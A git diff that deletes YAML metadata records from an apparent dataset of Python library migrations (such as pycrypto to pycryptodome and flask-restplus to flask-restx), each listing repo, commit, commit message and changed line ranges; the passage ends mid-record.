a/v1/data/migration/58237dc_mysql-python,pymysql.yaml b/v1/data/migration/58237dc_mysql-python,pymysql.yaml deleted file mode 100644 index 0fd4573..0000000 --- a/v1/data/migration/58237dc_mysql-python,pymysql.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 58237dc_mysql-python,pymysql -source: mysql-python -target: pymysql -repo: hustlzp/flask-boost -commit: 58237dc1f7a1296630951179b78a29a77c730b85 -pair_id: mysql-python,pymysql -commit_message: Use PyMySQL instead of MySQL-python to support Python3. -commit_url: https://github.com/hustlzp/flask-boost/commit/58237dc1 -code_changes: [] diff --git a/v1/data/migration/5924dc0_pycrypto,pycryptodome.yaml b/v1/data/migration/5924dc0_pycrypto,pycryptodome.yaml deleted file mode 100644 index dc5ae63..0000000 --- a/v1/data/migration/5924dc0_pycrypto,pycryptodome.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 5924dc0_pycrypto,pycryptodome -source: pycrypto -target: pycryptodome -repo: n1nj4sec/pupy -commit: 5924dc061834370c0b0688ff21d86bcbcfbeb000 -pair_id: pycrypto,pycryptodome -commit_message: Let's try to use pycryptodome instead of pycrypto -commit_url: https://github.com/n1nj4sec/pupy/commit/5924dc06 -code_changes: [] diff --git a/v1/data/migration/598f275_flask-restplus,flask-restx.yaml b/v1/data/migration/598f275_flask-restplus,flask-restx.yaml deleted file mode 100644 index 7e61b45..0000000 --- a/v1/data/migration/598f275_flask-restplus,flask-restx.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: 598f275_flask-restplus,flask-restx -source: flask-restplus -target: flask-restx -repo: pythondataintegrator/pythondataintegrator -commit: 598f275f11bdb1796b4ea0f6b3676a45758c08c4 -pair_id: flask-restplus,flask-restx -commit_message: requirements updated and restx integrated. some model updated -commit_url: https://github.com/pythondataintegrator/pythondataintegrator/commit/598f275f -code_changes: -- filepath: src/api/controllers/operation/models/DataOperationModels.py - lines: - - '5:5' -- filepath: src/api/controllers/operation/models/JobSchedulerModels.py - lines: - - '5:5' -- filepath: src/api/infrastructor/api/ResourceBase.py - lines: - - '1:1' -- filepath: src/api/controllers/common/models/CommonModels.py - lines: - - '3:5' -- filepath: src/api/IocManager.py - lines: - - '6:6' -- filepath: src/api/controllers/integration/models/DataIntegrationModels.py - lines: - - '4:4' -- filepath: src/api/controllers/job/models/JobModels.py - lines: - - '4:4' -- filepath: src/api/controllers/connection/models/ConnectionModels.py - lines: - - '4:4' diff --git a/v1/data/migration/59d8319_flask-restplus,flask-restx.yaml b/v1/data/migration/59d8319_flask-restplus,flask-restx.yaml deleted file mode 100644 index 2170af6..0000000 --- a/v1/data/migration/59d8319_flask-restplus,flask-restx.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: 59d8319_flask-restplus,flask-restx -source: flask-restplus -target: flask-restx -repo: apryor6/flaskerize -commit: 59d8319355bf95f26949fe13ac3d6be5b5282fb6 -pair_id: flask-restplus,flask-restx -commit_message: Update to use flask-restx -commit_url: https://github.com/apryor6/flaskerize/commit/59d83193 -code_changes: -- filepath: flaskerize/generate.py - lines: - - 152:152 -- filepath: flaskerize/schematics/entity/files/{{ name }}.template/controller.py.template - lines: - - '1:1' - - '3:3' -- filepath: flaskerize/schematics/flask-api/files/{{ name }}.template/app/__init__.py - lines: - - '3:3' -- filepath: flaskerize/schematics/flask-api/files/{{ name }}.template/app/widget/controller.py - lines: - - '3:3' diff --git a/v1/data/migration/5a842ae_kafka-python,confluent-kafka.yaml b/v1/data/migration/5a842ae_kafka-python,confluent-kafka.yaml deleted file mode 100644 index 0899e0d..0000000 --- a/v1/data/migration/5a842ae_kafka-python,confluent-kafka.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: 5a842ae_kafka-python,confluent-kafka -source: kafka-python -target: confluent-kafka -repo: openstack/oslo.messaging -commit: 5a842ae15582e4eedfb1b2510eaf4a8997701f58 -pair_id: kafka-python,confluent-kafka -commit_message: 'Switch driver to confluent-kafka client library - - - This patch switches the kafka python client from kafka-python to - - confluent-kafka due to documented threading issues with the - - kafka-python consumer and the recommendation to use multiplrocessing. - - The confluent-kafka client leverages the high performance librdkafka - - C client and is safe for multiple thread use. - - - This patch: - - * switches to confluent-kafka library - - * revises consumer and producer message operations - - * utilizes event.tpool method for confluent-kafka blocking calls - - * updates unit tests - - * adds kafka specific timeouts for functional tests - - * adds release note - - - Depends-On: Ice374dca539b8ed1b1965b75379bad5140121483 - - Change-Id: Idfb9fe3700d882c8285c6dc56b0620951178eba2' -commit_url: https://github.com/openstack/oslo.messaging/commit/5a842ae1 -code_changes: -- filepath: oslo_messaging/_drivers/impl_kafka.py - lines: - - 220-232:231-248 - - 288-297:316-326 - - 26-28:18-19 diff --git a/v1/data/migration/5c76c96_xlrd,openpyxl.yaml b/v1/data/migration/5c76c96_xlrd,openpyxl.yaml deleted file mode 100644 index a3db42c..0000000 --- a/v1/data/migration/5c76c96_xlrd,openpyxl.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 5c76c96_xlrd,openpyxl -source: xlrd -target: openpyxl -repo: asehmi/data-science-meetup-oxford -commit: 5c76c96f1062ddf9be986f6b8416101aef88d0cd -pair_id: xlrd,openpyxl -commit_message: '[security fix] replacing xlrd default with explicit openpyxl in pd.read_excel()' -commit_url: https://github.com/asehmi/data-science-meetup-oxford/commit/5c76c96f -code_changes: [] diff --git a/v1/data/migration/5cb810e_pil,pillow.yaml b/v1/data/migration/5cb810e_pil,pillow.yaml deleted file mode 100644 index 7a43967..0000000 --- a/v1/data/migration/5cb810e_pil,pillow.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: 5cb810e_pil,pillow -source: pil -target: pillow -repo: getpelican/pelican-plugins -commit: 5cb810ebbd5204b6d4dbb6f2a6161219364c7f19 -pair_id: pil,pillow -commit_message: 'Fixed issue with images that had no alpha channel. New feature that - dynamically sizes image as part of watermark. - - - Refactored photos. Added watermark and blacklist. Fixed some bugs. Updated documentation - - - Updated documentation to include pillow' -commit_url: https://github.com/getpelican/pelican-plugins/commit/5cb810eb -code_changes: [] diff --git a/v1/data/migration/5ded32a_pycrypto,pycryptodome.yaml b/v1/data/migration/5ded32a_pycrypto,pycryptodome.yaml deleted file mode 100644 index baad1bb..0000000 --- a/v1/data/migration/5ded32a_pycrypto,pycryptodome.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 5ded32a_pycrypto,pycryptodome -source: pycrypto -target: pycryptodome -repo: cybercentrecanada/assemblyline-service-cuckoo -commit: 5ded32a52c92e7f3b89602ca3600fec9ac5a1662 -pair_id: pycrypto,pycryptodome -commit_message: Use pycryptodome instead of pycrypto -commit_url: https://github.com/cybercentrecanada/assemblyline-service-cuckoo/commit/5ded32a5 -code_changes: [] diff --git a/v1/data/migration/5eb6909_eventlet,gevent.yaml b/v1/data/migration/5eb6909_eventlet,gevent.yaml deleted file mode 100644 index ca137b0..0000000 --- a/v1/data/migration/5eb6909_eventlet,gevent.yaml +++ /dev/null @@ -1,11 +0,0 @@ -id: 5eb6909_eventlet,gevent -source: eventlet -target: gevent -repo: sc3/cookcountyjail -commit: 5eb69097a2476b09ce7dd7fff6dbd2c1af5830d6 -pair_id: eventlet,gevent -commit_message: 'Issue #249 - started on new scraper. - - Version version of Monitor and SearchCommands class' -commit_url: https://github.com/sc3/cookcountyjail/commit/5eb69097 -code_changes: [] diff --git a/v1/data/migration/5f2c76c_py-bcrypt,bcrypt.yaml b/v1/data/migration/5f2c76c_py-bcrypt,bcrypt.yaml deleted file mode 100644 index c5c39a8..0000000 --- a/v1/data/migration/5f2c76c_py-bcrypt,bcrypt.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: 5f2c76c_py-bcrypt,bcrypt -source: py-bcrypt -target: bcrypt -repo: pwnlandia/mhn -commit: 5f2c76c5a4d257ec46de8b653160d8a4549f657e -pair_id: py-bcrypt,bcrypt -commit_message: 'Upgrade py-bcrypt to bcrypt - - - Fixes issue #244 on GitHub.' -commit_url: https://github.com/pwnlandia/mhn/commit/5f2c76c5 -code_changes: [] diff --git a/v1/data/migration/5f4d92a_slackclient,slack-sdk.yaml b/v1/data/migration/5f4d92a_slackclient,slack-sdk.yaml deleted file mode 100644 index 0e00d5c..0000000 --- a/v1/data/migration/5f4d92a_slackclient,slack-sdk.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: 5f4d92a_slackclient,slack-sdk -source: slackclient -target: slack-sdk -repo: slackapi/python-slack-sdk -commit: 5f4d92a8048814fc4938753594e74d7cfc74c27a -pair_id: slackclient,slack-sdk -commit_message: Update the tutorial to be up-to-date with v3 -commit_url: https://github.com/slackapi/python-slack-sdk/commit/5f4d92a8 -code_changes: -- filepath: tutorial/PythOnBoardingBot/async_app.py - lines: - - 146:147 - - '42:43' - - 65:66 - - 94:95 - - 123:124 - - 7:7-8 -- filepath: tutorial/PythOnBoardingBot/app.py - lines: - - '4:4' diff --git a/v1/data/migration/633e7d1_gevent,eventlet.yaml b/v1/data/migration/633e7d1_gevent,eventlet.yaml deleted file mode 100644 index d117fa5..0000000 --- a/v1/data/migration/633e7d1_gevent,eventlet.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 633e7d1_gevent,eventlet -source: gevent -target: eventlet -repo: iqtlabs/poseidon -commit: 633e7d1b5b0c7f12a89bdb5504084f4f760a37eb -pair_id: gevent,eventlet -commit_message: use eventlet instead of gevent -commit_url: https://github.com/iqtlabs/poseidon/commit/633e7d1b -code_changes: [] diff --git a/v1/data/migration/6b0f04a_pycrypto,pycryptodome.yaml b/v1/data/migration/6b0f04a_pycrypto,pycryptodome.yaml deleted file mode 100644 index 0488d83..0000000 --- a/v1/data/migration/6b0f04a_pycrypto,pycryptodome.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 6b0f04a_pycrypto,pycryptodome -source: pycrypto -target: pycryptodome -repo: wh1te909/tacticalrmm -commit: 6b0f04a5b0b77d029cff0f16e0292d66116b9bdf -pair_id: pycrypto,pycryptodome -commit_message: replace pycrypto with newer pycryptodome -commit_url: https://github.com/wh1te909/tacticalrmm/commit/6b0f04a5 -code_changes: [] diff --git a/v1/data/migration/6b10345_kafka-python,confluent-kafka.yaml b/v1/data/migration/6b10345_kafka-python,confluent-kafka.yaml deleted file mode 100644 index c473c56..0000000 --- a/v1/data/migration/6b10345_kafka-python,confluent-kafka.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: 6b10345_kafka-python,confluent-kafka -source: kafka-python -target: confluent-kafka -repo: biznetgio/restknot -commit: 6b10345398630fbb418f84ca7268d481ecad56ee -pair_id: kafka-python,confluent-kafka -commit_message: 'Update: migrate to `confluent-kafka-python` - - - Works out-of-the-box for multiple Kafka brokers. - - Bonus: it''s faster and more maintained.' -commit_url: https://github.com/biznetgio/restknot/commit/6b103453 -code_changes: -- filepath: agent/dnsagent/clis/start.py - lines: - - 35:35-36 -- filepath: api/app/helpers/producer.py - lines: - - 18-21:18-20 - - 31:35-36 - - '5:5' diff --git a/v1/data/migration/6b629d0_flask-restplus,flask-restx.yaml b/v1/data/migration/6b629d0_flask-restplus,flask-restx.yaml deleted file mode 100644 index 5c50111..0000000 --- a/v1/data/migration/6b629d0_flask-restplus,flask-restx.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: 6b629d0_flask-restplus,flask-restx -source: flask-restplus -target: flask-restx -repo: orchest/orchest -commit: 6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 -pair_id: flask-restplus,flask-restx -commit_message: 'Replace ''flask_restplus'' with ''flask_restx'' - - - `flask_restplus'' is not longer actively maintained, whereas - - `flask_restx` is an actively maintained fork. - - - Fixes: #23' -commit_url: https://github.com/orchest/orchest/commit/6b629d0d -code_changes: -- filepath: services/orchest-api/app/app/apis/namespace_projects.py - lines: - - '6:6' -- filepath: services/orchest-api/app/app/apis/namespace_pipelines.py - lines: - - '6:6' -- filepath: services/orchest-api/app/app/apis/namespace_environment_builds.py - lines: - - '6:6' -- filepath: services/orchest-api/app/app/schema.py - lines: - - '9:9' -- filepath: services/orchest-api/app/app/apis/namespace_experiments.py - lines: - - '8:8' -- filepath: services/orchest-api/app/app/utils.py - lines: - - '8:8' -- filepath: services/orchest-api/app/app/apis/namespace_validations.py - lines: - - '7:7' -- filepath: services/orchest-api/app/app/apis/__init__.py - lines: - - '2:2' -- filepath: services/orchest-api/app/app/apis/namespace_sessions.py - lines: - - '5:5' -- filepath: services/orchest-api/app/app/apis/namespace_environment_images.py - lines: - - '4:4' -- filepath: services/orchest-api/app/app/apis/namespace_runs.py - lines: - - '11:11' diff --git a/v1/data/migration/6e7ee63_requests,aiohttp.yaml b/v1/data/migration/6e7ee63_requests,aiohttp.yaml deleted file mode 100644 index e8ebe98..0000000 --- a/v1/data/migration/6e7ee63_requests,aiohttp.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 6e7ee63_requests,aiohttp -source: requests -target: aiohttp -repo: epsagon/epsagon-kubernetes -commit: 6e7ee63ded228a139c4198bffb3f64675228f12e -pair_id: requests,aiohttp -commit_message: Watch based agent -commit_url: https://github.com/epsagon/epsagon-kubernetes/commit/6e7ee63d -code_changes: [] diff --git a/v1/data/migration/70b3abc_mysql-python,pymysql.yaml b/v1/data/migration/70b3abc_mysql-python,pymysql.yaml deleted file mode 100644 index 690058c..0000000 --- a/v1/data/migration/70b3abc_mysql-python,pymysql.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: 70b3abc_mysql-python,pymysql -source: mysql-python -target: pymysql -repo: rnacentral/rnacentral-webcode -commit: 70b3abc581fa5dbaabe9ffa7727cccec5433634e -pair_id: mysql-python,pymysql -commit_message: 'Use PyMySQL driver instead of MySQLdb - - - because PyMySQL is written in pure python and is easier to install' -commit_url: https://github.com/rnacentral/rnacentral-webcode/commit/70b3abc5 -code_changes: [] diff --git a/v1/data/migration/71aff3a_retrying,tenacity.yaml b/v1/data/migration/71aff3a_retrying,tenacity.yaml deleted file mode 100644 index 3701a7c..0000000 --- a/v1/data/migration/71aff3a_retrying,tenacity.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: 71aff3a_retrying,tenacity -source: retrying -target: tenacity -repo: intelai/inference-model-manager -commit: 71aff3a0bd1ae2a7d7d91858dcbe721de152693e -pair_id: retrying,tenacity -commit_message: Replace retrying with tenacity (#119) -commit_url: https://github.com/intelai/inference-model-manager/commit/71aff3a0 -code_changes: -- filepath: tests/management_api_tests/context.py - lines: - - '1:1' - - 70:70 - - 90:90 - - 107:107 -- filepath: management/management_api/tenants/tenants_utils.py - lines: - - 109:108 - - 129:128 - - '5:5' -- filepath: tests/conftest.py - lines: - - 120:120 - - '4:4' -- filepath: tests/management_api_tests/endpoints/endpoint_utils.py - lines: - - 108:108 - - '3:3' diff --git a/v1/data/migration/728f86e_django-rest-swagger,drf-yasg.yaml b/v1/data/migration/728f86e_django-rest-swagger,drf-yasg.yaml deleted file mode 100644 index c40cb6b..0000000 --- a/v1/data/migration/728f86e_django-rest-swagger,drf-yasg.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: 728f86e_django-rest-swagger,drf-yasg -source: django-rest-swagger -target: drf-yasg -repo: bcgov/theorgbook -commit: 728f86e941dfb6bdbee27628d28425757af5f22d -pair_id: django-rest-swagger,drf-yasg -commit_message: 'Use drf-yasg instead of django_rest_swagger - - - Signed-off-by: Nicholas Rempel ' -commit_url: https://github.com/bcgov/theorgbook/commit/728f86e9 -code_changes: -- filepath: tob-api/api_v2/swagger.py - lines: - - 6:7-8 diff --git a/v1/data/migration/7811c8f_eventlet,gevent.yaml b/v1/data/migration/7811c8f_eventlet,gevent.yaml deleted file mode 100644 index 92b493a..0000000 --- a/v1/data/migration/7811c8f_eventlet,gevent.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 7811c8f_eventlet,gevent -source: eventlet -target: gevent -repo: teamsempo/sempoblockchain -commit: 7811c8f9c0c4d75e6c7a24d597f613fb85b46361 -pair_id: eventlet,gevent -commit_message: swapping to gevent (#389) -commit_url: https://github.com/teamsempo/sempoblockchain/commit/7811c8f9 -code_changes: [] diff --git a/v1/data/migration/7ba8676_logbook,loguru.yaml b/v1/data/migration/7ba8676_logbook,loguru.yaml deleted file mode 100644 index 9eafb87..0000000 --- a/v1/data/migration/7ba8676_logbook,loguru.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 7ba8676_logbook,loguru -source: logbook -target: loguru -repo: thombashi/tcconfig -commit: 7ba8676b3b9347ef15142bfeba30d611822c154d -pair_id: logbook,loguru -commit_message: Replace the logging library -commit_url: https://github.com/thombashi/tcconfig/commit/7ba8676b -code_changes: -- filepath: tcconfig/_logger.py - lines: - - 18,29:20 - - '6:10' diff --git a/v1/data/migration/7ea7ddb_flask,quart.yaml b/v1/data/migration/7ea7ddb_flask,quart.yaml deleted file mode 100644 index df7ee2b..0000000 --- a/v1/data/migration/7ea7ddb_flask,quart.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: 7ea7ddb_flask,quart -source: flask -target: quart -repo: synesthesiam/voice2json -commit: 7ea7ddb8400775282e82c1adcb17b013f27ede2b -pair_id: flask,quart -commit_message: Using quart for web interface -commit_url: https://github.com/synesthesiam/voice2json/commit/7ea7ddb8 -code_changes: -- filepath: web/app.py - lines: - - 100:102 - - 105:107 - - 166:172 - - 195:202 - - 235:243 - - 237:245 - - 242:250 - - '20:20' - - '28:28' - - 59:59-60 - - 95:96-97 - - 188:194-195 - - 212:219-220 diff --git a/v1/data/migration/813214e_slackclient,slack-sdk.yaml b/v1/data/migration/813214e_slackclient,slack-sdk.yaml deleted file mode 100644 index d5ee57e..0000000 --- a/v1/data/migration/813214e_slackclient,slack-sdk.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: 813214e_slackclient,slack-sdk -source: slackclient -target: slack-sdk -repo: slackapi/python-slack-events-api -commit: 813214e403c800722dd5a92449cb0a49b8b73abc -pair_id: slackclient,slack-sdk -commit_message: version 3.0.0 -commit_url: https://github.com/slackapi/python-slack-events-api/commit/813214e4 -code_changes: -- filepath: example/current_app/main.py - lines: - - '9:2' -- filepath: example/blueprint/example.py - lines: - - '12:2' -- filepath: example/example.py - lines: - - '2:2' -- filepath: example/working_with_proxy/example.py - lines: - - '12:2' diff --git a/v1/data/migration/85d50bb_pil,pillow.yaml b/v1/data/migration/85d50bb_pil,pillow.yaml deleted file mode 100644 index 814ca81..0000000 --- a/v1/data/migration/85d50bb_pil,pillow.yaml +++ /dev/null @@ -1,61 +0,0 @@ -id: 85d50bb_pil,pillow -source: pil -target: pillow -repo: learning-unlimited/esp-website -commit: 85d50bbb948c4486b943d2f594d033a1cbf99187 -pair_id: pil,pillow -commit_message: 'Fixes PIL dependency - - - Teachers without biography photos were generating 500 errors on their - - biography pages. This was happening with the assignment - - teacherbio.picture = ''images/not-available.jpg''. - - PIL was throwing the exception "decoder jpeg not available". - - - libjpeg-dev is a dependency for PIL jpeg decoder support. See - - . - - This is now added as a dependency. - - - The bug remained after making this change. Further investigation revealed that - - PIL does not easily support virtualenv. It looks for the jpeg decoder files in - - a fixed directory; see - - - - and . - - - PIL has not been updated since 2009, and it is unlikely that virtualenv - - support will be added. However, the Pillow package, a fork of PIL, does - - support virtualenv, and is under active development. See - - and . - - - This commit changes the dependency on PIL to a dependency on Pillow. After - - uninstalling PIL and installing Pillow, the bug is fixed. However, manage.py - - validate will complain about the lack of PIL. - - - If PIL is already installed in the virtualenv, the following commands must be - - run to uninstall PIL: - - $ source env/bin/activate - - $ pip uninstall PIL' -commit_url: https://github.com/learning-unlimited/esp-website/commit/85d50bbb -code_changes: [] diff --git a/v1/data/migration/86244b6_pyqt5,pyside6.yaml b/v1/data/migration/86244b6_pyqt5,pyside6.yaml deleted file mode 100644 index 5e258ac..0000000 --- a/v1/data/migration/86244b6_pyqt5,pyside6.yaml +++ /dev/null @@ -1,97 +0,0 @@ -id: 86244b6_pyqt5,pyside6 -source: pyqt5 -target: pyside6 -repo: toufool/auto-split -commit: 86244b6c190f48200826788fa6af4bd8d26b230f -pair_id: pyqt5,pyside6 -commit_message: Python 3.9 + PyQt6 -commit_url: https://github.com/toufool/auto-split/commit/86244b6c -code_changes: -- filepath: src/AutoSplit.py - lines: - - '4:4' - - 139:141 - - 164:166 - - 617:619 - - 680:682 - - 881:883 - - 968:961 -- filepath: src/resources_rc.py - lines: - - '9:6' -- filepath: src/settings_file.py - lines: - - '2:2' -- filepath: src/error_messages.py - lines: - - '2:2' -- filepath: src/about.py - lines: - - '9:9' - - '32:34' - - '48:50' - - '77:79' -- filepath: src/screen_region.py - lines: - - '1:1' - - 224:227 - - 229-230:232-233 - - 257-258:260-261 - - 268:271 - - 273:276 - - 277:280 -- filepath: src/menu_bar.py - lines: - - '2:2' -- filepath: src/design.py - lines: - - '9:9' - - '29:31' - - '37:39' - - '40:42' - - '52:54' - - 77:79 - - 90:92 - - 94:96 - - 98:100 - - 102:104 - - 109:111 - - 155:157 - - 172:174 - - 176:178 - - 180:182 - - 184:186 - - 188:190 - - 192:194 - - 194:196 - - 198:200 - - 200:202 - - 204:206 - - 206:208 - - 210:212 - - 212:214 - - 216:218 - - 218:220 - - 222:224 - - 224:226 - - 228:230 - - 230:232 - - 234:236 - - 236:238 - - 240:242 - - 242:244 - - 249:251 - - 251:253 - - 262:264 - - 308:310 - - 312:314 - - 317:319 - - 326:328 - - 365:367 - - 373:375 - - 456:458 - - 458:460 - - 460:462 - - 462:464 - - 464:466 - - 561:563 diff --git a/v1/data/migration/8778a80_pil,pillow.yaml b/v1/data/migration/8778a80_pil,pillow.yaml deleted file mode 100644 index 43d892d..0000000 --- a/v1/data/migration/8778a80_pil,pillow.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: 8778a80_pil,pillow -source: pil -target: pillow -repo: django-wiki/django-wiki -commit: 8778a806c038dc4e1a602e3094b518896b3db112 -pair_id: pil,pillow -commit_message: 'Replace PIL with Pillow - - - Somehow PIL is not making Travis very happy atm.' -commit_url: https://github.com/django-wiki/django-wiki/commit/8778a806 -code_changes: [] diff --git a/v1/data/migration/87a5671_xlrd,openpyxl.yaml b/v1/data/migration/87a5671_xlrd,openpyxl.yaml deleted file mode 100644 index d85d43d..0000000 --- a/v1/data/migration/87a5671_xlrd,openpyxl.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 87a5671_xlrd,openpyxl -source: xlrd -target: openpyxl -repo: oeg-upm/mapeathor -commit: 87a5671e807b70b06dbb00dc8e297aee61b1632b -pair_id: xlrd,openpyxl -commit_message: xlrd bug fixed -commit_url: https://github.com/oeg-upm/mapeathor/commit/87a5671e -code_changes: [] diff --git a/v1/data/migration/89b64c6_raven,sentry-sdk.yaml b/v1/data/migration/89b64c6_raven,sentry-sdk.yaml deleted file mode 100644 index 210f913..0000000 --- a/v1/data/migration/89b64c6_raven,sentry-sdk.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 89b64c6_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: stencila/hub -commit: 89b64c61cf613c8feb301146edb23a461f153e3d -pair_id: raven,sentry-sdk -commit_message: 'fix(Error logging): Upgrade to sentry-sdk; use message for migrations, - not exception - - - Closes #336 and #350' -commit_url: https://github.com/stencila/hub/commit/89b64c61 -code_changes: [] diff --git a/v1/data/migration/89c7afc_pymilvus-orm,pymilvus.yaml b/v1/data/migration/89c7afc_pymilvus-orm,pymilvus.yaml deleted file mode 100644 index dbcb7af..0000000 --- a/v1/data/migration/89c7afc_pymilvus-orm,pymilvus.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 89c7afc_pymilvus-orm,pymilvus -source: pymilvus-orm -target: pymilvus -repo: milvus-io/bootcamp -commit: 89c7afc6548362e9bbf1dbf6142aabb02bc3bb93 -pair_id: pymilvus-orm,pymilvus -commit_message: update benchmark test script for Milvus 2.0.0-rc5 -commit_url: https://github.com/milvus-io/bootcamp/commit/89c7afc6 -code_changes: -- filepath: benchmark_test/scripts/milvus_helpers.py - lines: - - 2-5,7:2 - - 98:96 diff --git a/v1/data/migration/8d0ec68_retrying,tenacity.yaml b/v1/data/migration/8d0ec68_retrying,tenacity.yaml deleted file mode 100644 index b942a51..0000000 --- a/v1/data/migration/8d0ec68_retrying,tenacity.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 8d0ec68_retrying,tenacity -source: retrying -target: tenacity -repo: pokainc/cfn-cross-region-export -commit: 8d0ec687838ea69612d7b1236e2341198aef7937 -pair_id: retrying,tenacity -commit_message: 'Fix: Add retry logic to prevent throttling issue when listing exports - (#13)' -commit_url: https://github.com/pokainc/cfn-cross-region-export/commit/8d0ec687 -code_changes: -- filepath: importer/lambda/cross_region_importer.py - lines: - - '10:10' diff --git a/v1/data/migration/8ef3b62_flask-restful,flask-restplus.yaml b/v1/data/migration/8ef3b62_flask-restful,flask-restplus.yaml deleted file mode 100644 index a32e211..0000000 --- a/v1/data/migration/8ef3b62_flask-restful,flask-restplus.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: 8ef3b62_flask-restful,flask-restplus -source: flask-restful -target: flask-restplus -repo: ziirish/burp-ui -commit: 8ef3b624e52ac6a9420c533b0dd744a36d91c4d3 -pair_id: flask-restful,flask-restplus -commit_message: use flask-restplus -commit_url: https://github.com/ziirish/burp-ui/commit/8ef3b624 -code_changes: -- filepath: burpui/api/client.py - lines: - - '13:13' -- filepath: burpui/api/restore.py - lines: - - '18:18' -- filepath: burpui/api/__init__.py - lines: - - '14:14' -- filepath: burpui/api/misc.py - lines: - - '15:15' -- filepath: burpui/api/servers.py - lines: - - '8:8' -- filepath: burpui/api/settings.py - lines: - - '14:14' -- filepath: burpui/api/clients.py - lines: - - '15:15' diff --git a/v1/data/migration/902b66d_pil,pillow.yaml b/v1/data/migration/902b66d_pil,pillow.yaml deleted file mode 100644 index 9e153f3..0000000 --- a/v1/data/migration/902b66d_pil,pillow.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 902b66d_pil,pillow -source: pil -target: pillow -repo: gml16/rl-medical -commit: 902b66dfcb506bae0c9f4ac4a69dc4a1f22cec9e -pair_id: pil,pillow -commit_message: Fixed requirement from PIL to pillow -commit_url: https://github.com/gml16/rl-medical/commit/902b66df -code_changes: [] diff --git a/v1/data/migration/9291b54_pycryptodome,pycryptodomex.yaml b/v1/data/migration/9291b54_pycryptodome,pycryptodomex.yaml deleted file mode 100644 index 3cc7cf4..0000000 --- a/v1/data/migration/9291b54_pycryptodome,pycryptodomex.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: 9291b54_pycryptodome,pycryptodomex -source: pycryptodome -target: pycryptodomex -repo: malwaredllc/byob -commit: 9291b54ed6a1c727030c571a6ebdf7b344781c8f -pair_id: pycryptodome,pycryptodomex -commit_message: 'Suggest change to pycryptodomex vs pycryptodome Crypto hooks - - - In preparation for pyinstaller or similar compilation tools as it would - - be beneficial to migrate to the more explicit Cryptodome namespace due - - to a notable lack of support for pycryptodome hooks in pyinstaller.' -commit_url: https://github.com/malwaredllc/byob/commit/9291b54e -code_changes: -- filepath: byob/modules/ransom.py - lines: - - 68:68 - - 131:131 - - 187:187 - - 212:212 - - 75:75 - - 132-133:132-133 - - 188:188 - - 213:213 -- filepath: byob/core/security.py - lines: - - 20-23:20-23 - - '41:41' - - 43-44:43-44 - - '46:46' - - 64:64 - - 85:85 - - 84:84 diff --git a/v1/data/migration/936761f_dataproperty,typepy.yaml b/v1/data/migration/936761f_dataproperty,typepy.yaml deleted file mode 100644 index 127298e..0000000 --- a/v1/data/migration/936761f_dataproperty,typepy.yaml +++ /dev/null @@ -1,14 +0,0 @@ -id: 936761f_dataproperty,typepy -source: dataproperty -target: typepy -repo: thombashi/datetimerange -commit: 936761f779c4f7dc8c2d4c03c47b6e7b6e978a89 -pair_id: dataproperty,typepy -commit_message: Add timestamp as support input value types -commit_url: https://github.com/thombashi/datetimerange/commit/936761f7 -code_changes: -- filepath: datetimerange/__init__.py - lines: - - '11:13' - - 457-458:465-466 - - 484-485:498-499 diff --git a/v1/data/migration/963f347_gcloud-aio-core,aiohttp.yaml b/v1/data/migration/963f347_gcloud-aio-core,aiohttp.yaml deleted file mode 100644 index 9e7a271..0000000 --- a/v1/data/migration/963f347_gcloud-aio-core,aiohttp.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 963f347_gcloud-aio-core,aiohttp -source: gcloud-aio-core -target: aiohttp -repo: talkiq/gcloud-aio -commit: 963f34706918757ab7d3cbad70c363b9a48b9d40 -pair_id: gcloud-aio-core,aiohttp -commit_message: 'refactor(datastore): remove core.http dependency' -commit_url: https://github.com/talkiq/gcloud-aio/commit/963f3470 -code_changes: -- filepath: datastore/gcloud/aio/datastore/datastore.py - lines: - - 142:154-157 - - '5:4' diff --git a/v1/data/migration/9abf7b1_slackclient,slack-sdk.yaml b/v1/data/migration/9abf7b1_slackclient,slack-sdk.yaml deleted file mode 100644 index ee0a0da..0000000 --- a/v1/data/migration/9abf7b1_slackclient,slack-sdk.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: 9abf7b1_slackclient,slack-sdk -source: slackclient -target: slack-sdk -repo: alice-biometrics/petisco -commit: 9abf7b1f6ef8c55bdddcb9a5c2eff513f6a93130 -pair_id: slackclient,slack-sdk -commit_message: 'Fix rabbitmq bugs (connector argument position) (#167) - - - * Fix rabbitmq bugs (connector argument position) - - - * Update SlackNotifiers and Converters. Add channel.confirm_delivery() on MessageBuses - - - * Fix typo (Uncontrolled Exception instead of Uncontroller Exception)' -commit_url: https://github.com/alice-biometrics/petisco/commit/9abf7b1f -code_changes: -- filepath: petisco/legacy/notifier/infrastructure/slack/slack_notifier.py - lines: - - 1-2:1-2 -- filepath: 